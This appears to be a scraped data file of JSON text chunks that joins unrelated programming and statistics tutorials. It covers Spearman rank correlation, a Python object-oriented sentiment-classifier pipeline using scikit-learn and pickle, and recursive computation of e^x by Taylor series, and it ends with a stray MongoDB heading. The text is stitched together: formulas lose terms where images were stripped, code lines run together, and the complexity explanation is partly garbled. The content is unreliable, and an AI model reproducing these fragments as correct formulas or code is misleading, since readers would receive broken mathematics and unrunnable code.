[ { "code": null, "e": 24581, "s": 24553, "text": "\n18 Aug, 2020" }, { "code": null, "e": 24879, "s": 24581, "text": "What is correlation test?The strength of the association between two variables is known as the correlation test. For instance, if we are interested to know whether there is a relationship between the heights of fathers and sons, a correlation coefficient can be calculated to answer this question." }, { "code": null, "e": 24930, "s": 24879, "text": "For know more about correlation please refer this." }, { "code": null, "e": 25006, "s": 24930, "text": "Methods for correlation analysis:There are mainly two types of correlation:" }, { "code": null, "e": 25214, "s": 25006, "text": "Parametric Correlation – Pearson correlation(r) : It measures a linear dependence between two variables (x and y) is known as a parametric correlation test because it depends on the distribution of the data." }, { "code": null, "e": 25362, "s": 25214, "text": "Non-Parametric Correlation – Kendall(tau) and Spearman(rho): They are rank-based correlation coefficients, are known as non-parametric correlation." }, { "code": null, "e": 25392, "s": 25362, "text": "Spearman Correlation formula:" }, { "code": null, "e": 25560, "s": 25392, "text": "where,rs = Spearman Correlation coefficientdi = the difference in the ranks given to the two variables values for each item of the data,n = total number of observation" }, { "code": null, "e": 25912, "s": 25560, "text": "Example: In the Spearman’s rank correlation what we do is convert the data even if it is real value data to what we call ranks. Let’s consider taking 10 different data points in variable X1 and Y1. And find out their respective ranks. Then find out the square of the difference in the ranks given to the two variables values for each item of the data." }, { "code": null, "e": 25934, "s": 25912, "text": "Step 1: Finding Rank-" }, { "code": null, "e": 26548, "s": 25934, "text": "Rank X1: So, what we have done is looked at all the individual values of X1 and assigned a rank to it. For example, the lowest value, in this case, is 2 and it is given a rank 1 the next highest value is 3 that is given a rank 2 and so on. So, we are ranked all of these points. Notice that the sixth and the first value both are tied. So, they get the rank of 6.5(the midway the half of it) because there is a tie. Similarly, if there are more than 2 values that are tied we take all these ranks and average them by the number of data points that have equal values, and correspondingly you have to give the rank." }, { "code": null, "e": 26624, "s": 26548, "text": "Rank Y1: Similarly, you can give rank to Y1 data points in the same manner." }, { "code": null, "e": 27166, "s": 26624, "text": "Step 2: Calculate d2–Once you have got the rank you compute the difference in the ranks. So, in this case, the difference in the rank for the first data point is 2 and we square it, similarly, we take the difference in the second data point in the ranks between Xi and Yi which is 2 and square it and we get 4. So, like this, we make the difference in the ranks and by squaring it we get the final what we call the d squared values. We sum overall values and then we compute the Spearman coefficient by using this value in the above formula." }, { "code": null, "e": 27308, "s": 27166, "text": "By putting the value of the overall sum of d2 and n value\n\nrho/rs = 1 - ((6 x 20.5) / 990)\n = 1 - (123 / 990)\n = 1 - 0.1242\n = 0.88\n" }, { "code": null, "e": 27320, "s": 27308, "text": "Properties:" }, { "code": null, "e": 27399, "s": 27320, "text": "rs takes a value between -1(negative association) and 1(positive association)." }, { "code": null, "e": 27428, "s": 27399, "text": "rs = 0 means no association." }, { "code": null, "e": 27475, "s": 27428, "text": "It can be used when association is non linear." }, { "code": null, "e": 27516, "s": 27475, "text": "It can be applied for ordinal variables." }, { "code": null, "e": 27971, "s": 27516, "text": "Spearman Correlation for Anscombe’s Data:Anscombe’s data also known as Anscombe’s quartet comprises of four datasets that have nearly identical simple statistical properties, yet appear very different when graphed. Each dataset consists of eleven (x, y) points. They were constructed in 1973 by the statistician Francis Anscombe to demonstrate both the importance of graphing data before analyzing it and the effect of outliers on statistical properties." }, { "code": null, "e": 28146, "s": 27971, "text": "Those 4 sets of 11 data-points are given here. Please download the csv file here.When we plot those points it looks like this. I am considering 3 sets of 11 data-points here." }, { "code": null, "e": 28927, "s": 28146, "text": "A brief explanation of the above diagram:So, if we apply Spearman correlation coefficient for each of these data sets we find that it is nearly identical, it does not matter whether you actually apply into a first data set (top left) or second data set (top right) or the third data set (bottom left). So, what it seems to indicate is that if we apply the Spearman correlation and we find the reasonably high correlation coefficient close to one in this first data set(top left) case. The key point is here we can’t conclude immediately that if the Spearman correlation coefficient is going to be high then there is a linear relationship between them, for example in the second data set(top right) this is a non-linear relationship and still gives rise to a reasonably high value." }, { "code": null, "e": 28940, "s": 28927, "text": "data-science" }, { "code": null, "e": 28963, "s": 28940, "text": "statistical-algorithms" }, { "code": null, "e": 28980, "s": 28963, "text": "Machine Learning" }, { "code": null, "e": 28997, "s": 28980, "text": "Machine Learning" }, { "code": null, "e": 29095, "s": 28997, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 29104, "s": 29095, "text": "Comments" }, { "code": null, "e": 29117, "s": 29104, "text": "Old Comments" }, { "code": null, "e": 29140, "s": 29117, "text": "ML | Linear Regression" }, { "code": null, "e": 29154, "s": 29140, "text": "Decision Tree" }, { "code": null, "e": 29192, "s": 29154, "text": "Python | Decision tree implementation" }, { "code": null, "e": 29216, "s": 29192, "text": "Search Algorithms in AI" }, { "code": null, "e": 29272, "s": 29216, "text": "Difference between Informed and Uninformed Search in AI" }, { "code": null, "e": 29312, "s": 29272, "text": "Decision Tree Introduction with example" }, { "code": null, "e": 29358, "s": 29312, "text": "Elbow Method for optimal value of k in KMeans" }, { "code": null, "e": 29400, "s": 29358, "text": "Deploy Machine Learning Model using Flask" }, { "code": null, "e": 29423, "s": 29400, "text": "Reinforcement learning" } ]
Python: The (unofficial) OOP crash course for (aspiring) data scientists! | by Jake | Towards Data Science
Python is experiencing tremendous increases in its market demand and user base; whether you’re a developer, analyst, researcher or engineer, there’s a good chance that python is being used in your domain. The barrier to entry could not be lower with so many free educational materials (such as Automate the Boring Stuff.) Oddly, however, we’re seeing an unusual consequence: Pythonistas are plateauing prematurely, terminating their study of python fundamentals in favor of domain specific learning of libraries and frameworks. This is especially true for the present day data science culture; after gaining intermediate familiarity with strings, lists, and dictionaries, prospective pythonistas jump directly into Numpy, Pandas, and Scikit-Learn (if not Keras, TensorFlow, or PyTorch.) So should you study data structures and algorithms (DS&A), implementing a binary tree or linked list from scratch? What is the appropriate “I’ve learned enough python fundamentals” threshold to start one’s domain-specific journey? There’s no “one size fits all” answer; however, I recommend familiarizing yourself with OOP at the very least before jumping into topics like regression, classification, and clustering. To make sense of OOP, we need to briefly discuss functional programming; without diving deep into this paradigm, suffice to say, functional programming separates functions (actions) from data (information), whereas OOP views this as a false dichotomy. Have you used python’s built in list before? (Yes) Surely you’ve noticed that the append method allowed you to insert an element after the current last element, automatically incrementing the list’s length? (Yes) Congrats! You like OOP. The fact that the data type and its methods (functions attached to an object) are one cohesive whole, is the core “essence” of OOP. In the following code snippets, I’m going to define a class or two, and demonstrate some essential OOP concepts around an established machine learning task so that you can see how OOP can benefit the data scientist. We will be classifying Yelp reviews using any variety of ML algorithms. In fact, this class will receive only two mandatory arguments, the data and the model you wish to use. (There will of course be several other algorithms), however, this class architecture will allow us to do the following: (1) Divide data into train and test sets, (2) Preprocess and vectorize data into TF-IDF tokens, (3) train the model, (4) compute accuracy and related metrics on test set performance, and (5) save the model via pickle. This pipeline will greatly increase your efficiency. I, like many others, jumped into ~data science material before having a solid handle on the fundamentals. I’d scroll up and down through notebooks looking for the right variables I had defined earlier. And if I wanted to compare the performance of 2 or 3 models, it would become a nightmare, making sure I referenced the appropriate variable names. You’ll see that with the following approach, comparing model performance will be a trivial task and (with any luck,) I’ll have made an OOP evangelist out of you! For display issues, see this GitHub Gist. As you’ll note above, I’ve defined two classes: DataSplitter and Classifier. For starters, let’s just look at DataSplitter; we’ll visit Classifier shortly thereafter. DataSplitter receives a dataframe, the name of the text column and the name of the sentiment column. Then train_test_split is used to assign the class following attributes: x_train, x_test, y_train, and y_test. Note that the random_state and test_percent parameters have default values. What this means is — unless you specifically change either of these parameters, two class instances will have identical x_train, x_test, y_train, and y_test attributes. This will be useful as we can compare ML models directly without worry that they were trained on (slightly) different datasets. When a DataSplitter class object is instantiated, you can access these values very simply: import pandas as pddata = pd.read_csv('yelp_samples_500k.csv')d = data.sample(n=1000)ds = DataSplitter(data=d,x_var='text',y_var='sentiment')ds.x_test>>>267157 This place always has a line so I expected to ...197388 Would give them a zero stars if I could. They ... As you can see, the self keyword binds these attributes to the object. Using dot notation, it’s trivial to retrieve these attributes. On to our next OOP concept: Inheritance! For this example we’ll move onto the second class, Classifier. Inheritance simply means one class inheriting functionality from a previously defined class. In our case, Classifier will inherit all the functionality of DataSplitter; note two things: (1) DataSplitter receives no class to inherit from in its definition DataSplitter() whereas Classifier(DataSplitter) does receive a class to inherit from. (2) The super keyword is used in Classifier’s __init__ method. This has the effect of executing DataSplitter’s init method then moving on to all other instructions specific to Classifier’s own init method. Bottom line, we train/test/split our data without retyping all that code over again! After the init method, you’ll see __vectorize . Note the double underscores preceding the definition. This is how encapsulation is achieved in python. Encapsulation means ~the object has access attributes and methods that are not available to the programmer. In other words, they’re abstracted away (or encapsulated) as to not distract the programmer. from sklearn.naive_bayes import MultinomialNBnb = MultinomialNB()c = Classifier(data=d,model_instance=nb,x_var='text',y_var='sentiment')c.__vectorize('some text')>>>AttributeError: 'Classifier' object has no attribute '__vectorize' In other words, the object has access to these methods, however, we do not! Speaking of methods, if you hadn’t guessed — methods are simply functions built into a class object. The methods we’ve defined above include __vectorize, __fit, __evaluate_accuracy, metrics, predict, and save. Starting with vectorize, we use NLTK’s word_tokenize function to tokenize all words and punctuation into unigrams. Next, we use NLTK’s ngrams function to create bigrams and trigrams 'I like dogs' #text['I', 'like', 'dogs'] #unigrams['I like', 'like dogs'] #bigrams['I like dogs'] #trigram This method improves upon unigrams greatly because it allows for ML models to learn the difference between “good” and “not good,” for example. Note that I’ve not removed stopwords or punctuation and haven’t stemmed word tokens either. This might be a good homework assignment if you’re interested in expanding functionality! The __vectorize method is delivered to the pipeline attribute, which is created by the __fit method. Likewise, the __fit method trains the ML model supplied to the init method and creates predictions (preds.) The following method __evaluate_accuracy determines the binary accuracy of the model and assigns as a class attribute for ease of access later (no need to recompute multiple times.) Next, our metrics method will either retrieve binary accuracy for us or print the classification report (precision, recall, etc.) Our predict methods productionizes this code with simplicity. Supply text to the method call and either a class will be assigned or the probability of belonging to class 1 will be returned. (If you’re interested in multiclass classification, some adjustments will be necessary — I’ll leave that to you as a homework problem!) Lastly, the save method receives a file-path and pickles the entire object. This is neat — all we have to do is open the pickled file to access all class methods and attributes, including the fully trained model! from sklearn.naive_bayes import MultinomialNBnb = MultinomialNB()nb_model = Classifier(data=data,model_instance=nb,x_var='text',y_var='sentiment')nb_model.metrics()>>>'92.77733333333333 percent accurate' Let’s compare this to the random forest classifier! from sklearn.ensemble import RandomForestClassifierrf = RandomForestClassifier()rf_model = Classifier(data=data,model_instance=rf,x_var='text',y_var='sentiment')rf_model.metrics()>>>'86.29666666666667 percent accurate' It appears that our naive bayes model outperforms our random forest classifier. Saving our object (and opening it again for later use) is as easy as: ## savingnb_model.save('nb_model') #will append .pkl to end of input## opening for later usewith open('nb_model.pkl','rb') as f: loaded_model = pickle.load(f)loaded_model.predict("This tutorial was super awesome!",prob=True)>>>0.943261472480177 # 94% certain of positive sentiment I hope you’ve enjoyed this tutorial; my goals were — concise, informative, and practical. To meet all three objectives, some OOP topics didn’t make the cut (polymorphism, for example.) Please comment if you found this helpful. Likewise, if you’d like me to explore similar concepts, post a comment and I’ll see if it’s something I can work into future articles. Thank you for reading — If you think my content is alright, please subscribe! :)
[ { "code": null, "e": 959, "s": 172, "text": "Python is experiencing tremendous increases in its market demand and user base; whether you’re a developer, analyst, researcher or engineer, there’s a good chance that python is being used in your domain. The barrier to entry could not be lower with so many free educational materials (such as Automate the Boring Stuff.) Oddly, however, we’re seeing an unusual consequence: Pythonistas are plateauing prematurely, terminating their study of python fundamentals in favor of domain specific learning of libraries and frameworks. This is especially true for the present day data science culture; after gaining intermediate familiarity with strings, lists, and dictionaries, prospective pythonistas jump directly into Numpy, Pandas, and Scikit-Learn (if not Keras, TensorFlow, or PyTorch.)" }, { "code": null, "e": 1376, "s": 959, "text": "So should you study data structures and algorithms (DS&A), implementing a binary tree or linked list from scratch? What is the appropriate “I’ve learned enough python fundamentals” threshold to start one’s domain-specific journey? There’s no “one size fits all” answer; however, I recommend familiarizing yourself with OOP at the very least before jumping into topics like regression, classification, and clustering." }, { "code": null, "e": 1841, "s": 1376, "text": "To make sense of OOP, we need to briefly discuss functional programming; without diving deep into this paradigm, suffice to say, functional programming separates functions (actions) from data (information), whereas OOP views this as a false dichotomy. Have you used python’s built in list before? (Yes) Surely you’ve noticed that the append method allowed you to insert an element after the current last element, automatically incrementing the list’s length? (Yes)" }, { "code": null, "e": 1997, "s": 1841, "text": "Congrats! You like OOP. The fact that the data type and its methods (functions attached to an object) are one cohesive whole, is the core “essence” of OOP." }, { "code": null, "e": 2508, "s": 1997, "text": "In the following code snippets, I’m going to define a class or two, and demonstrate some essential OOP concepts around an established machine learning task so that you can see how OOP can benefit the data scientist. We will be classifying Yelp reviews using any variety of ML algorithms. In fact, this class will receive only two mandatory arguments, the data and the model you wish to use. (There will of course be several other algorithms), however, this class architecture will allow us to do the following:" }, { "code": null, "e": 2726, "s": 2508, "text": "(1) Divide data into train and test sets, (2) Preprocess and vectorize data into TF-IDF tokens, (3) train the model, (4) compute accuracy and related metrics on test set performance, and (5) save the model via pickle." }, { "code": null, "e": 3290, "s": 2726, "text": "This pipeline will greatly increase your efficiency. I, like many others, jumped into ~data science material before having a solid handle on the fundamentals. I’d scroll up and down through notebooks looking for the right variables I had defined earlier. And if I wanted to compare the performance of 2 or 3 models, it would become a nightmare, making sure I referenced the appropriate variable names. You’ll see that with the following approach, comparing model performance will be a trivial task and (with any luck,) I’ll have made an OOP evangelist out of you!" }, { "code": null, "e": 3332, "s": 3290, "text": "For display issues, see this GitHub Gist." }, { "code": null, "e": 3499, "s": 3332, "text": "As you’ll note above, I’ve defined two classes: DataSplitter and Classifier. For starters, let’s just look at DataSplitter; we’ll visit Classifier shortly thereafter." }, { "code": null, "e": 4083, "s": 3499, "text": "DataSplitter receives a dataframe, the name of the text column and the name of the sentiment column. Then train_test_split is used to assign the class following attributes: x_train, x_test, y_train, and y_test. Note that the random_state and test_percent parameters have default values. What this means is — unless you specifically change either of these parameters, two class instances will have identical x_train, x_test, y_train, and y_test attributes. This will be useful as we can compare ML models directly without worry that they were trained on (slightly) different datasets." }, { "code": null, "e": 4174, "s": 4083, "text": "When a DataSplitter class object is instantiated, you can access these values very simply:" }, { "code": null, "e": 4446, "s": 4174, "text": "import pandas as pddata = pd.read_csv('yelp_samples_500k.csv')d = data.sample(n=1000)ds = DataSplitter(data=d,x_var='text',y_var='sentiment')ds.x_test>>>267157 This place always has a line so I expected to ...197388 Would give them a zero stars if I could. They ..." }, { "code": null, "e": 4580, "s": 4446, "text": "As you can see, the self keyword binds these attributes to the object. Using dot notation, it’s trivial to retrieve these attributes." }, { "code": null, "e": 5316, "s": 4580, "text": "On to our next OOP concept: Inheritance! For this example we’ll move onto the second class, Classifier. Inheritance simply means one class inheriting functionality from a previously defined class. In our case, Classifier will inherit all the functionality of DataSplitter; note two things: (1) DataSplitter receives no class to inherit from in its definition DataSplitter() whereas Classifier(DataSplitter) does receive a class to inherit from. (2) The super keyword is used in Classifier’s __init__ method. This has the effect of executing DataSplitter’s init method then moving on to all other instructions specific to Classifier’s own init method. Bottom line, we train/test/split our data without retyping all that code over again!" }, { "code": null, "e": 5668, "s": 5316, "text": "After the init method, you’ll see __vectorize . Note the double underscores preceding the definition. This is how encapsulation is achieved in python. Encapsulation means ~the object has access attributes and methods that are not available to the programmer. In other words, they’re abstracted away (or encapsulated) as to not distract the programmer." }, { "code": null, "e": 5900, "s": 5668, "text": "from sklearn.naive_bayes import MultinomialNBnb = MultinomialNB()c = Classifier(data=d,model_instance=nb,x_var='text',y_var='sentiment')c.__vectorize('some text')>>>AttributeError: 'Classifier' object has no attribute '__vectorize'" }, { "code": null, "e": 5976, "s": 5900, "text": "In other words, the object has access to these methods, however, we do not!" }, { "code": null, "e": 6368, "s": 5976, "text": "Speaking of methods, if you hadn’t guessed — methods are simply functions built into a class object. The methods we’ve defined above include __vectorize, __fit, __evaluate_accuracy, metrics, predict, and save. Starting with vectorize, we use NLTK’s word_tokenize function to tokenize all words and punctuation into unigrams. Next, we use NLTK’s ngrams function to create bigrams and trigrams" }, { "code": null, "e": 6476, "s": 6368, "text": "'I like dogs' #text['I', 'like', 'dogs'] #unigrams['I like', 'like dogs'] #bigrams['I like dogs'] #trigram " }, { "code": null, "e": 7861, "s": 6476, "text": "This method improves upon unigrams greatly because it allows for ML models to learn the difference between “good” and “not good,” for example. Note that I’ve not removed stopwords or punctuation and haven’t stemmed word tokens either. This might be a good homework assignment if you’re interested in expanding functionality! The __vectorize method is delivered to the pipeline attribute, which is created by the __fit method. Likewise, the __fit method trains the ML model supplied to the init method and creates predictions (preds.) The following method __evaluate_accuracy determines the binary accuracy of the model and assigns as a class attribute for ease of access later (no need to recompute multiple times.) Next, our metrics method will either retrieve binary accuracy for us or print the classification report (precision, recall, etc.) Our predict methods productionizes this code with simplicity. Supply text to the method call and either a class will be assigned or the probability of belonging to class 1 will be returned. (If you’re interested in multiclass classification, some adjustments will be necessary — I’ll leave that to you as a homework problem!) Lastly, the save method receives a file-path and pickles the entire object. This is neat — all we have to do is open the pickled file to access all class methods and attributes, including the fully trained model!" }, { "code": null, "e": 8065, "s": 7861, "text": "from sklearn.naive_bayes import MultinomialNBnb = MultinomialNB()nb_model = Classifier(data=data,model_instance=nb,x_var='text',y_var='sentiment')nb_model.metrics()>>>'92.77733333333333 percent accurate'" }, { "code": null, "e": 8117, "s": 8065, "text": "Let’s compare this to the random forest classifier!" }, { "code": null, "e": 8336, "s": 8117, "text": "from sklearn.ensemble import RandomForestClassifierrf = RandomForestClassifier()rf_model = Classifier(data=data,model_instance=rf,x_var='text',y_var='sentiment')rf_model.metrics()>>>'86.29666666666667 percent accurate'" }, { "code": null, "e": 8486, "s": 8336, "text": "It appears that our naive bayes model outperforms our random forest classifier. Saving our object (and opening it again for later use) is as easy as:" }, { "code": null, "e": 8770, "s": 8486, "text": "## savingnb_model.save('nb_model') #will append .pkl to end of input## opening for later usewith open('nb_model.pkl','rb') as f: loaded_model = pickle.load(f)loaded_model.predict(\"This tutorial was super awesome!\",prob=True)>>>0.943261472480177 # 94% certain of positive sentiment" }, { "code": null, "e": 9132, "s": 8770, "text": "I hope you’ve enjoyed this tutorial; my goals were — concise, informative, and practical. To meet all three objectives, some OOP topics didn’t make the cut (polymorphism, for example.) Please comment if you found this helpful. Likewise, if you’d like me to explore similar concepts, post a comment and I’ll see if it’s something I can work into future articles." } ]
Program to Calculate e^x by Recursion ( using Taylor Series ) - GeeksforGeeks
16 Sep, 2021 The value of the Exponential function can be calculated using Taylor Series. = 1 + x/1! + /2! + /3! + ...... + until n terms As the number of terms increases the more precise value of ex is obtained. To find e^x using the recursive function, we need to use static variables. A function can return only one value, and when we need to include multiple values in a recursive function, we use static variables. The Taylor Series is a combination of multiple values like sum, power and factorial term, hence we will use static variables. For the power of x, we will use p, and for factorials, we will use f as static variables. The function shown below is used to increase the power of x. p = p*x The function below is used to find factorials. f = f*n The function below is used to calculate the summation of the series. r+p/f Where r is the recursive call to the function. Below is the implementation of the above idea. C++ C Java Python3 C# Javascript // C++ implementation of the approach#include <iostream>using namespace std; // Recursive Function with static// variables p and fdouble e(int x, int n){ static double p = 1, f = 1; double r; // Termination condition if (n == 0) return 1; // Recursive call r = e(x, n - 1); // Update the power of x p = p * x; // Factorial f = f * n; return (r + p / f);} // Driver codeint main(){ int x = 4, n = 15; cout<<"\n"<< e(x, n); return 0;} // this code is contributed by shivanisinghss2110 // C implementation of the approach#include <stdio.h> // Recursive Function with static// variables p and fdouble e(int x, int n){ static double p = 1, f = 1; double r; // Termination condition if (n == 0) return 1; // Recursive call r = e(x, n - 1); // Update the power of x p = p * x; // Factorial f = f * n; return (r + p / f);} // Driver codeint main(){ int x = 4, n = 15; printf("%lf \n", e(x, n)); return 0;} // Java implementation of the approachimport java.text.*; class GFG { // Recursive Function with static // variables p and f static double p = 1, f = 1; static double e(int x, int n) { double r; // Termination condition if (n == 0) return 1; // Recursive call r = e(x, n - 1); // Update the power of x p = p * x; // Factorial f = f * n; return (r + p / f); } // Driver code public static void main(String[] args) { int x = 4, n = 15; DecimalFormat df = new DecimalFormat("0.######"); System.out.println(df.format(e(x, n))); }} // This code is contributed by mits # Python implementation of the approach # Recursive Function# global variables p and fp = 1.0f = 1.0 def e(x, n): global p, f # Termination condition if (n == 0): return 1 # Recursive call r = e(x, n - 1) # Update the power of x p = p * x # Factorial f = f * n return (r + p / f) # Driver code x = 4n = 15print(e(x, n)) # This contributed by ihritik // C# implementation of the approachusing System; class GFG { // Recursive Function with static // variables p and f static double p = 1, f = 1; static double e(int x, int n) { double r; // Termination condition if (n == 0) return 1; // Recursive call r = e(x, n - 1); // Update the power of x p = p * x; // Factorial f = f * n; return (r + p / f); } // Driver code static void Main() { int x = 4, n = 15; Console.WriteLine(Math.Round(e(x, n), 6)); }} // This code is contributed by mits <script> // Javascript implementation of the approach // Recursive Function with static// variables p and fp = 1, f = 1;function e(x, n){ var r; // Termination condition if (n == 0) return 1; // Recursive call r = e(x, n - 1); // Update the power of x p = p * x; // Factorial f = f * n; return (r + p / f);} // Driver Codevar x = 4, n = 15;var res = e(x, n); document.write(res.toFixed(6)); // This code is contributed by kirti </script> 54.597883 Time Complexity: To find this we will determine the total multiplication performed. e^x = 1 + x/1! + x^2/2! + x^3/3! + ...... + until n terms = 1 + x/1 + x*x/1*2 + x*x*x/1*2*3 + x*x*x*x/1*2*3*4 ...... + until n terms 0 0 2 4 8 Number of Multiplications in above terms So, for n terms total multiplication performed is comparable to sum of n natural numbers (as a parallel series of even numbers is formed). and we know sum of n natural numbers = n*(n+1)/2 whose order is n2 Hence, the time complexity if this approach is O(n2) Auxiliary Space: The recursive call will take place n+1 times and hence n + 1 activation records will get created at max. That shows the space complexity is O(n). Mithun Kumar ihritik Kirti_Mangal pankajsharmagfg amoghpete sagartomar9927 shivanisinghss2110 series Algorithms Mathematical Recursion Mathematical Recursion series Algorithms Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments SDE SHEET - A Complete Guide for SDE Preparation DSA Sheet by Love Babbar Introduction to Algorithms Converting Roman Numerals to Decimal lying between 1 to 3999 K means Clustering - Introduction Program for Fibonacci numbers C++ Data Types Write a program to print all permutations of a given string Set in C++ Standard Template Library (STL) Coin Change | DP-7
[ { "code": null, "e": 24614, "s": 24586, "text": "\n16 Sep, 2021" }, { "code": null, "e": 24692, "s": 24614, "text": "The value of the Exponential function can be calculated using Taylor Series. " }, { "code": null, "e": 24741, "s": 24692, "text": " = 1 + x/1! + /2! + /3! + ...... + until n terms" }, { "code": null, "e": 24816, "s": 24741, "text": "As the number of terms increases the more precise value of ex is obtained." }, { "code": null, "e": 25149, "s": 24816, "text": "To find e^x using the recursive function, we need to use static variables. A function can return only one value, and when we need to include multiple values in a recursive function, we use static variables. The Taylor Series is a combination of multiple values like sum, power and factorial term, hence we will use static variables." }, { "code": null, "e": 25240, "s": 25149, "text": "For the power of x, we will use p, and for factorials, we will use f as static variables. " }, { "code": null, "e": 25303, "s": 25240, "text": "The function shown below is used to increase the power of x. " }, { "code": null, "e": 25312, "s": 25303, "text": "p = p*x " }, { "code": null, "e": 25360, "s": 25312, "text": "The function below is used to find factorials. " }, { "code": null, "e": 25368, "s": 25360, "text": "f = f*n" }, { "code": null, "e": 25438, "s": 25368, "text": "The function below is used to calculate the summation of the series. " }, { "code": null, "e": 25444, "s": 25438, "text": "r+p/f" }, { "code": null, "e": 25491, "s": 25444, "text": "Where r is the recursive call to the function." }, { "code": null, "e": 25540, "s": 25491, "text": "Below is the implementation of the above idea. " }, { "code": null, "e": 25544, "s": 25540, "text": "C++" }, { "code": null, "e": 25546, "s": 25544, "text": "C" }, { "code": null, "e": 25551, "s": 25546, "text": "Java" }, { "code": null, "e": 25559, "s": 25551, "text": "Python3" }, { "code": null, "e": 25562, "s": 25559, "text": "C#" }, { "code": null, "e": 25573, "s": 25562, "text": "Javascript" }, { "code": "// C++ implementation of the approach#include <iostream>using namespace std; // Recursive Function with static// variables p and fdouble e(int x, int n){ static double p = 1, f = 1; double r; // Termination condition if (n == 0) return 1; // Recursive call r = e(x, n - 1); // Update the power of x p = p * x; // Factorial f = f * n; return (r + p / f);} // Driver codeint main(){ int x = 4, n = 15; cout<<\"\\n\"<< e(x, n); return 0;} // this code is contributed by shivanisinghss2110", "e": 26111, "s": 25573, "text": null }, { "code": "// C implementation of the approach#include <stdio.h> // Recursive Function with static// variables p and fdouble e(int x, int n){ static double p = 1, f = 1; double r; // Termination condition if (n == 0) return 1; // Recursive call r = e(x, n - 1); // Update the power of x p = p * x; // Factorial f = f * n; return (r + p / f);} // Driver codeint main(){ int x = 4, n = 15; printf(\"%lf \\n\", e(x, n)); return 0;}", "e": 26581, "s": 26111, "text": null }, { "code": "// Java implementation of the approachimport java.text.*; class GFG { // Recursive Function with static // variables p and f static double p = 1, f = 1; static double e(int x, int n) { double r; // Termination condition if (n == 0) return 1; // Recursive call r = e(x, n - 1); // Update the power of x p = p * x; // Factorial f = f * n; return (r + p / f); } // Driver code public static void main(String[] args) { int x = 4, n = 15; DecimalFormat df = new DecimalFormat(\"0.######\"); System.out.println(df.format(e(x, n))); }} // This code is contributed by mits", "e": 27283, "s": 26581, "text": null }, { "code": "# Python implementation of the approach # Recursive Function# global variables p and fp = 1.0f = 1.0 def e(x, n): global p, f # Termination condition if (n == 0): return 1 # Recursive call r = e(x, n - 1) # Update the power of x p = p * x # Factorial f = f * n return (r + p / f) # Driver code x = 4n = 15print(e(x, n)) # This contributed by ihritik", "e": 27678, "s": 27283, "text": null }, { "code": "// C# implementation of the approachusing System; class GFG { // Recursive Function with static // variables p and f static double p = 1, f = 1; static double e(int x, int n) { double r; // Termination condition if (n == 0) return 1; // Recursive call r = e(x, n - 1); // Update the power of x p = p * x; // Factorial f = f * n; return (r + p / f); } // Driver code static void Main() { int x = 4, n = 15; Console.WriteLine(Math.Round(e(x, n), 6)); }} // This code is contributed by mits", "e": 28298, "s": 27678, "text": null }, { "code": "<script> // Javascript implementation of the approach // Recursive Function with static// variables p and fp = 1, f = 1;function e(x, n){ var r; // Termination condition if (n == 0) return 1; // Recursive call r = e(x, n - 1); // Update the power of x p = p * x; // Factorial f = f * n; return (r + p / f);} // Driver Codevar x = 4, n = 15;var res = e(x, n); document.write(res.toFixed(6)); // This code is contributed by kirti </script>", "e": 28778, "s": 28298, "text": null }, { "code": null, "e": 28788, "s": 28778, "text": "54.597883" }, { "code": null, "e": 28808, "s": 28790, "text": "Time Complexity: " }, { "code": null, "e": 28875, "s": 28808, "text": "To find this we will determine the total multiplication performed." }, { "code": null, "e": 28933, "s": 28875, "text": "e^x = 1 + x/1! + x^2/2! + x^3/3! + ...... + until n terms" }, { "code": null, "e": 29016, "s": 28933, "text": " = 1 + x/1 + x*x/1*2 + x*x*x/1*2*3 + x*x*x*x/1*2*3*4 ...... + until n terms" }, { "code": null, "e": 29150, "s": 29016, "text": " 0 0 2 4 8 Number of Multiplications in above terms" }, { "code": null, "e": 29289, "s": 29150, "text": "So, for n terms total multiplication performed is comparable to sum of n natural numbers (as a parallel series of even numbers is formed)." }, { "code": null, "e": 29356, "s": 29289, "text": "and we know sum of n natural numbers = n*(n+1)/2 whose order is n2" }, { "code": null, "e": 29409, "s": 29356, "text": "Hence, the time complexity if this approach is O(n2)" }, { "code": null, "e": 29427, "s": 29409, "text": "Auxiliary Space: " }, { "code": null, "e": 29573, "s": 29427, "text": "The recursive call will take place n+1 times and hence n + 1 activation records will get created at max. That shows the space complexity is O(n)." }, { "code": null, "e": 29586, "s": 29573, "text": "Mithun Kumar" }, { "code": null, "e": 29594, "s": 29586, "text": "ihritik" }, { "code": null, "e": 29607, "s": 29594, "text": "Kirti_Mangal" }, { "code": null, "e": 29623, "s": 29607, "text": "pankajsharmagfg" }, { "code": null, "e": 29633, "s": 29623, "text": "amoghpete" }, { "code": null, "e": 29648, "s": 29633, "text": "sagartomar9927" }, { "code": null, "e": 29667, "s": 29648, "text": "shivanisinghss2110" }, { "code": null, "e": 29674, "s": 29667, "text": "series" }, { "code": null, "e": 29685, "s": 29674, "text": "Algorithms" }, { "code": null, "e": 29698, "s": 29685, "text": "Mathematical" }, { "code": null, "e": 29708, "s": 29698, "text": "Recursion" }, { "code": null, "e": 29721, "s": 29708, "text": "Mathematical" }, { "code": null, "e": 29731, "s": 29721, "text": "Recursion" }, { "code": null, "e": 29738, "s": 29731, "text": "series" }, { "code": null, "e": 29749, "s": 29738, "text": "Algorithms" }, { "code": null, "e": 29847, "s": 29749, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 29856, "s": 29847, "text": "Comments" }, { "code": null, "e": 29869, "s": 29856, "text": "Old Comments" }, { "code": null, "e": 29918, "s": 29869, "text": "SDE SHEET - A Complete Guide for SDE Preparation" }, { "code": null, "e": 29943, "s": 29918, "text": "DSA Sheet by Love Babbar" }, { "code": null, "e": 29970, "s": 29943, "text": "Introduction to Algorithms" }, { "code": null, "e": 30031, "s": 29970, "text": "Converting Roman Numerals to Decimal lying between 1 to 3999" }, { "code": null, "e": 30065, "s": 30031, "text": "K means Clustering - Introduction" }, { "code": null, "e": 30095, "s": 30065, "text": "Program for Fibonacci numbers" }, { "code": null, "e": 30110, "s": 30095, "text": "C++ Data Types" }, { "code": null, "e": 30170, "s": 30110, "text": "Write a program to print all permutations of a given string" }, { "code": null, "e": 30213, "s": 30170, "text": "Set in C++ Standard Template Library (STL)" } ]
Command to show the database currently being used in MongoDB?
